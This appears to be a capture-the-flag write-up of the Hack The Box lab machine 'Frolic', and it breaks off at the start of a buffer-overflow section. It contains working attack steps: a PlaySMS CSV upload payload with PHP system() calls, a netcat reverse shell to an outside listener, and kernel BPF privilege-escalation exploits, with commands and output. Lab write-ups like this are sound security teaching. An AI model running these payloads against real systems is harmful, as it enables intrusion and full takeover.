Frolic
Contents
Ports scan
u505@kali:~/HTB/Machines/Frolic# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.111 --rate=1000
Starting masscan 1.0.5 at 2020-01-26 02:29:50 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 139/tcp on 10.10.10.111 Discovered open port 22/tcp on 10.10.10.111 Discovered open port 445/tcp on 10.10.10.111 Discovered open port 1880/tcp on 10.10.10.111 Discovered open port 9999/tcp on 10.10.10.111 Discovered open port 137/udp on 10.10.10.111
u505@kali:~/HTB/Machines/Frolic# nmap -sC -sV 10.10.10.111 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 21:30 EST Nmap scan report for frolic.htb (10.10.10.111) Host is up (0.047s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) | 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 9999/tcp open http nginx 1.10.3 (Ubuntu) |_http-server-header: nginx/1.10.3 (Ubuntu) |_http-title: Welcome to nginx! Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: |_clock-skew: mean: -1h49m54s, deviation: 3h10m30s, median: 4s |_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: frolic | NetBIOS computer name: FROLIC\x00 | Domain name: \x00 | FQDN: frolic |_ System time: 2020-01-26T08:00:43+05:30 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-01-26T02:30:43 |_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.34 seconds
Rerun of nmap with missing ports discovered with masscan
u50@kali:~/HTB/Machines/Frolic# nmap -sC -sV -p 22,137,139,445,1880,9999 10.10.10.111 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 21:33 EST Nmap scan report for frolic.htb (10.10.10.111) Host is up (0.14s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) | 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 137/tcp closed netbios-ns 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open http Node.js (Express middleware) |_http-title: Node-RED 9999/tcp open http nginx 1.10.3 (Ubuntu) |_http-server-header: nginx/1.10.3 (Ubuntu) |_http-title: Welcome to nginx! Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: |_clock-skew: mean: -1h49m54s, deviation: 3h10m30s, median: 4s |_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: frolic | NetBIOS computer name: FROLIC\x00 | Domain name: \x00 | FQDN: frolic |_ System time: 2020-01-26T08:04:02+05:30 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-01-26T02:34:02 |_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.63 seconds
Port 1880
Web enumeration
u505@kali:~/HTB/Machines/Frolic$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "js,txt" -f -t 1000 -u http://10.10.10.111:1880
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: js, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-02-12_10-03-30.log
Target: http://10.10.10.111:1880
[10:03:30] Starting: [10:03:32] 401 - 12B - /icons/ [10:03:49] 401 - 12B - /settings/ [10:03:56] 401 - 12B - /Icons/ [10:05:31] 401 - 12B - /nodes/ [10:08:25] 401 - 12B - /SETTINGS/ [10:09:06] 401 - 12B - /flows/ [10:22:16] 401 - 12B - /ICONS/
Task Completed
We found some folders, but none usable.
Node-RED RCE
I found an article about an RCE on the product Node-RED (https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/).
A quick check shows us that this instance seems protected.
u505@kali:~/HTB/Machines/Frolic$ curl -i http://10.10.10.111:1880/settings HTTP/1.1 401 Unauthorized X-Powered-By: Express WWW-Authenticate: Bearer realm="Users" Date: Wed, 12 Feb 2020 15:11:14 GMT Connection: keep-alive Content-Length: 12
Unauthorized
I downloaded the script anyway.
u505@kali:~/HTB/Machines/Frolic$ wget -q https://gist.githubusercontent.com/QKaiser/79459c3cb5ea6e658701c7d203a8c297/raw/8966e4ee07400f16b92737161ca8df3cbfa37f91/noderedsh.py
The script gets stuck because we need valid credentials
u505@kali:~/HTB/Machines/Frolic$ ./noderedsh.py http://10.10.10.111:1880 [+] Node-RED requires authentication. [+] Trying default credentials.
Port 9999
The port 9999 seems an empty installation of nging.
dirsearch
The first disrsearch detected some folders.
u505@kali:~/HTB/Machines/Frolic$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "js,txt" -f -t 1000 -u http://10.10.10.111:9999
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: js, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-02-12_13-39-29.log
Target: http://10.10.10.111:9999
[13:39:29] Starting: [13:39:32] 200 - 634B - /admin/ [13:39:35] 200 - 83KB - /test/ [13:39:37] 403 - 580B - /dev/ [13:39:43] 200 - 28B - /backup/ [13:41:04] 403 - 580B - /loop/ CTRL+C detected: Pausing threads, please wait...
Canceled by the user
I ran a second one but recursive with 3 levels and a smaller dictionary. (I removed files .ht*)
u505@kali:~/HTB/Machines/Frolic$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -r -R 3 -e "php,js,txt,html,css,png" -f -t 1000 -u http://10.10.10.111:9999
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: php, js, txt, html, css, png | HTTP method: get | Threads: 1000 | Wordlist size: 32283 | Recursion level: 3
Error Log: /opt/utils/dirsearch/logs/errors-20-02-12_13-59-20.log
Target: http://10.10.10.111:9999
[13:59:20] Starting: [13:59:27] 200 - 634B - /admin/ [13:59:31] 200 - 28B - /backup/ [13:59:44] 403 - 580B - /dev/ [14:00:37] 200 - 83KB - /test/ [14:00:46] Starting: admin/ [14:01:11] 403 - 580B - /admin/css/ [14:01:29] 200 - 634B - /admin/index.html [14:01:32] 403 - 580B - /admin/js/ [14:02:08] 200 - 1KB - /admin/success.html [14:02:20] Starting: backup/ [14:03:06] 200 - 28B - /backup/index.php [14:03:22] 200 - 22B - /backup/password.txt [14:03:48] 200 - 13B - /backup/user.txt [14:03:53] Starting: dev/ [14:04:03] 200 - 11B - /dev/backup/ [14:05:16] Starting: test/ [14:05:56] 200 - 83KB - /test/index.php [14:06:46] Starting: admin/css/ [14:08:05] 200 - 1KB - /admin/css/style.css [14:08:15] Starting: admin/js/ [14:09:07] 200 - 752B - /admin/js/login.js [14:09:46] Starting: dev/backup/ [14:10:28] 200 - 11B - /dev/backup/index.php
Task Completed
Folder admin
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/admin/ <html> <head> <title>Crack me :|</title> <!-- Include CSS File Here --> <link rel="stylesheet" href="css/style.css"/> <!-- Include JS File Here --> <script src="js/login.js"></script> </head> <body> <div class="container"> <div class="main"> <h2>c'mon i m hackable</h2> <form id="form_id" method="post" name="myform"> <label>User Name :</label> <input type="text" name="username" id="username"/> <label>Password :</label> <input type="password" name="password" id="password"/> <input type="button" value="Login" id="submit" onclick="validate()"/> </form> <span><b class="note">Note : Nothing</b></span> </div> </div> </body> </html>
The page is a static page with a form of user and password calling /admin/js/login.js
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/admin/js/login.js var attempt = 3; // Variable to count number of attempts. // Below function Executes on click of login button. function validate(){ var username = document.getElementById("username").value; var password = document.getElementById("password").value; if ( username == "admin" && password == "superduperlooperpassword_lol"){ alert ("Login successfully"); window.location = "success.html"; // Redirecting to other page. return false; } else{ attempt --;// Decrementing by one. alert("You have left "+attempt+" attempt;"); // Disabling fields after 3 attempts. if( attempt == 0){ document.getElementById("username").disabled = true; document.getElementById("password").disabled = true; document.getElementById("submit").disabled = true; return false; } } }
The login.js script have the password hard coded, and simply redirects to the page success.html
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/admin/success.html ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.
The page success is a little cryptic. https://esolangs.org/wiki/Ook! Ook is a rewriting of the BrainFuck, an already obfuscated esoteric programming language, designed to be writable and readable by orang-utans (which would communicate by pronouncing the onomatopoeia 'ook, ook'). Terry Pratchett's Discworld Library (https://en.wikipedia.org/wiki/Unseen_University#Librarian)
The webpage https://www.dcode.fr/ook-language allows us to decode the text.
Nothing here check /asdiSIAJJ0QWE9JAS
Downloading the URL gives us a base64 text.
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA u505@kali:~/HTB/Machines/Frolic$ wget -q http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/
We decrypt the base64
505@kali:~/HTB/Machines/Frolic$ cat index.html | base64 -d > index.dec
u505@kali:~/HTB/Machines/Frolic$ file index.dec
index.dec: Zip archive data, at least v2.0 to extract
The file seems to be a zip file.
u505@kali:~/HTB/Machines/Frolic$ cp index.dec index.zip
u505@kali:~/HTB/Machines/Frolic$ unzip index.zip
Archive: index.zip
[index.zip] index.php password:
skipping: index.php incorrect password
The zip file is password protected. We try brute force against the zip file.
u505@kali:~/HTB/Machines/Frolic$ zip2john index.zip > index.zip.john
ver 2.0 efh 5455 efh 7875 index.zip/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=176, decmplen=617, crc=145BFE23
u505@kali:~/HTB/Machines/Frolic$ john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt index.zip.john
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password (index.zip/index.php)
1g 0:00:00:00 DONE (2020-02-12 15:08) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s 123456..christal
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The password is found nearly instantly, it's password.
u505@kali:~/HTB/Machines/Frolic$ unzip index.zip Archive: index.zip [index.zip] index.php password: inflating: index.php u505@kali:~/HTB/Machines/Frolic$ cat index.php 4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a
The unzipped file seems an hexadecimal string.
u505@kali:~/HTB/Machines/Frolic$ cat index.php | xxd -r -p > index.hex u505@kali:~/HTB/Machines/Frolic$ cat index.hex KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
The file seems base64. (We need to remove CR to avoid base64)
u505@kali:~/HTB/Machines/Frolic$ tr -d '\r' <index.hex | base64 -d +++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+ ++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->--- <]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..<
The file seems to be brainfuck language, we go back to decode.fr
At the end of these breadcrumbs, we finally have something that seems a password.
idkwhatispass
Folder backup
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/backup/ password.txt user.txt loop/
The file user contains admin
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/backup/user.txt user - admin
And the file password contains a password
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/backup/password.txt password - imnothuman
Folder test
The folder test is phpinfo() page
A usefull information found is the server seems to have a mysql database.
Folder /dev/backup
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/dev/backup/ /playsms
This page seems gives us an other clue.
We can login in the application with user admin and password idkwhatispass found previously.
Exploit playsms
PlaySMS is a eree and Open Source SMS Gateway Software. (see https://playsms.org/)
search exploit
u505@kali:~/HTB/Machines/Frolic$ searchsploit playsms
----------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Uplo | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execut | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authentic | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusion | exploits/php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion | exploits/php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery | exploits/php/webapps/30177.txt
----------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
This video illustrate the exploit 42044 https://www.youtube.com/watch?v=KIB9sKQdEwE
CVE-2017-9101
The exploit 42044 from exploitdb (https://www.exploit-db.com/exploits/42044) is the CVE-2017-9101 (https://nvd.nist.gov/vuln/detail/CVE-2017-9101) Importing a mailicious phonebook cvs, we can execute php code.
u505@kali:~/HTB/Machines/Frolic$ cat badphonebook.csv Name, Mobile, Email, Group code, Tags <?php system("hostname") ?>,+1234,<?php system("whoami") ?>,1,1
The first field of the cvs has been executed, and returns the host name.
Our new malicious cvs should open a reverse shell
u505@kali:~/HTB/Machines/Frolic$ cat badphonebook2.csv
Name, Mobile, Email, Group code, Tags
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.26 4444 >/tmp/f"); echo "Thank you." ?>,+1234,email,1,1
We raise the listener.
u505@kali:~/HTB/Machines/Frolic$ rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
And our reverse shell is open
u505@kali:~/HTB/Machines/Frolic$ rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.111. Ncat: Connection from 10.10.10.111:59548. /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@frolic:~/html/playsms$ <CTRL-Z> u505@kali:~/HTB/Machines/Frolic$ stty -a speed 38400 baud; rows 24; columns 94; line = 0; intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0; -parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc u505@kali:~/HTB/Machines/Frolic$ stty raw -echo fg www-data@frolic:~/html/playsms$ stty raw -echo stty raw -echo www-data@frolic:~/html/playsms$ export TERM=screen www-data@frolic:~/html/playsms$ stty rows 24 columns 94
User Flag
www-data@frolic:~$ cd /home www-data@frolic:/home$ ls -l total 8 drwxr-xr-x 3 ayush ayush 4096 Sep 25 2018 ayush drwxr-xr-x 7 sahay sahay 4096 Sep 25 2018 sahay www-data@frolic:/home$ cd ayush www-data@frolic:/home/ayush$ cat user.txt <USER_FLAG>
Escalation of privileges
Enumeration
u505@kali:~/HTB/Machines/Frolic$ mkdir www u505@kali:~/HTB/Machines/Frolic/www$ cp /opt/utils/pspy/pspy32 ./ u505@kali:~/HTB/Machines/Frolic/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/Frolic/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the target
www-data@frolic:~$ cd /tmp www-data@frolic:/tmp$ wget -q http://10.10.14.26/pspy32 www-data@frolic:/tmp$ wget -q http://10.10.14.26/LinEnum.sh www-data@frolic:/tmp$ chmod +x pspy32 LinEnum.sh www-data@frolic:/tmp$ ./LinEnum.sh
The kernel information is interesting because version 4.4.0-116 is vulnerable
[-] Kernel information (continued):
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-023) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018
In the list of SUID files there is an interesting one.
-rwsr-xr-x 1 root root 7480 Sep 25 2018 /home/ayush/.binary/rop
pspy didn't find any programmed task.
www-data@frolic:~/html/playsms$ cat config.php | grep db cat config.php | grep db // mysql, mysqli, pgsql, odbc and others supported by PHP PEAR DB $core_config['db']['type'] = 'mysqli'; // database engine $core_config['db']['host'] = 'localhost'; // database host/server $core_config['db']['port'] = '3306'; // database port $core_config['db']['user'] = 'root'; // database username $core_config['db']['pass'] = 'ayush'; // database password $core_config['db']['name'] = 'playsms'; // database name // - http://pear.php.net/manual/en/package.database.db.intro-dsn.php // - http://pear.php.net/manual/en/package.database.db.intro-connect.php //$core_config['db']['dsn'] = 'mysql://root:password@localhost/playsms'; //$core_config['db']['options'] = $options = array('debug' => 2, 'portability' => DB_PORTABILITY_ALL);
The database engine runs with user mysql,
www-data@frolic:~/html/playsms$ mysql -p -u root mysql -p -u root Enter password: ayush
But I didn't find anything interesting into the database.
CVD-2017-16995
www-data@frolic:/tmp$ uname -a Linux frolic 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686 athlon i686 GNU/Linux
There is an exploit for this kernel
u505@kali:~/HTB/Machines/Frolic/www$ searchsploit 4.4.0-116
----------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Pr | exploits/linux/local/44298.c
----------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Upload exploit
u505@kali:~/HTB/Machines/Frolic/www$ searchsploit -m 44298
Exploit: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/44298
Path: /usr/share/exploitdb/exploits/linux/local/44298.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Frolic/www/44298.c
u505@kali:~/HTB/Machines/Frolic/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
From the target machine
www-data@frolic:/tmp$ wget -q http://10.10.14.26/44298.c
Compile exploit
www-data@frolic:/tmp$ gcc 44298.c -o 44298 gcc: error trying to exec 'cc1': execvp: No such file or directory
I cannot compile it from the target.
Compile from a 32 bits VM
From a created VM
u505@ubuntu1604432bits:~$ gcc 44298.c -o 44298 u505@ubuntu1604432bits:~$ ./44298 error: bogus fp u505@ubuntu1604432bits:~$ head 44298.c /* * Ubuntu 16.04.4 kernel priv esc * * all credits to @bleidl * - vnik // Tested on: // 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 // if different kernel adjust CRED offset + check kernel stack size */ u505@ubuntu1604432bits:~$ uname -a Linux ubuntu1604432bits 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686 i686 i686 GNU/Linux
It does not work, but I think because some parameters are not correct. I found thos POC on a 32 bits system Linux Kernel - BPF Sign Extension Local Privilege Escalation. But this one is done on Ubuntu 16.04.3, and the target is 16.04.4.
I download their code. u505@ubuntu1604432bits:~$ wget https://github.com/LiYangHart/Hacking_Project2/blob/master/upstream44.c --2020-02-13 11:33:52-- https://github.com/LiYangHart/Hacking_Project2/blob/master/upstream44.c Resolving github.com (github.com)... 140.82.113.3 Connecting to github.com (github.com)|140.82.113.3|:443... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: ‘upstream44.c.1’
upstream44.c.1 [ <=> ] 127.55K 237KB/s in 0.5s
2020-02-13 11:33:54 (237 KB/s) - ‘upstream44.c’ saved [130610]
It is the same code except for a few initial values
u505@ubuntu1604432bits:~$ grep "^#define" 44298.c upstream44.c 44298.c:#define PHYS_OFFSET 0xffff880000000000 44298.c:#define CRED_OFFSET 0x5f8 44298.c:#define UID_OFFSET 4 44298.c:#define LOG_BUF_SIZE 65536 44298.c:#define PROGSIZE 328 44298.c:#define __update_elem(a, b, c) \ upstream44.c:#define PHYS_OFFSET 0x00 upstream44.c:#define CRED_OFFSET 0x3f0 upstream44.c:#define UID_OFFSET 4 upstream44.c:#define LOG_BUF_SIZE 65536 upstream44.c:#define PROGSIZE 328 upstream44.c:#define __update_elem(a, b, c) \
I tried with these values
u505@ubuntu1604432bits:~$ gcc upstream44.c -o upstream44 u505@ubuntu1604432bits:~$ ./upstream44 task_struct = 400 Killed
But it still didn't work.
u505@kali:~/HTB/Machines/Frolic$ searchsploit 45010
----------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - L | exploits/linux/local/45010.c
----------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Frolic$ searchsploit -m 45010
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Frolic/45010.c
The exploit 45010 is very near of this one.
u505@ubuntu1604432bits:~$ gcc 45010.c -o 45010 u505@ubuntu1604432bits:~$ ./45010 [.] [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t) [.] [.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel ** [.] [*] creating bpf map [*] sneaking evil bpf past the verifier [*] creating socketpair() [*] attaching bpf backdoor to socket Killed
It doesn't work neither.
u505@ubuntu1604432bits:~$ ./upstream44
task_struct = f243d000
uidptr = f6db8e84
spawning root shell
root@ubuntu1604432bits:~# whoami
root
But if after 45010 failure upstream44 is run, it works :) , the root shell is spawned.
Run from target
www-data@frolic:/tmp$ wget -q http://10.10.14.26/45010 www-data@frolic:/tmp$ wget -q http://10.10.14.26/upstream44 www-data@frolic:/tmp$ chmod +x 45010 upstream44 www-data@frolic:/tmp$ ./45010 [.] [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t) [.] [.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel ** [.] [*] creating bpf map [*] sneaking evil bpf past the verifier [*] creating socketpair() [*] attaching bpf backdoor to socket Killed www-data@frolic:/tmp$ ./upstream44 task_struct = f61ee400 uidptr = f1b24084 spawning root shell root@frolic:/tmp# whoami root
Alternative way by Buffer overflow
I think, this was the intended way to solve this box.
www-data@frolic:/home/ayush/.binary$ ls -l
total 8
-rwsr-xr-x 1 root root 7480 Sep 25 2018 rop
www-data@frolic:/home/ayush/.binary$ ./rop Hello
[+] Message sent: Hello
www-data@frolic:/home/ayush/.binary$ ./rop
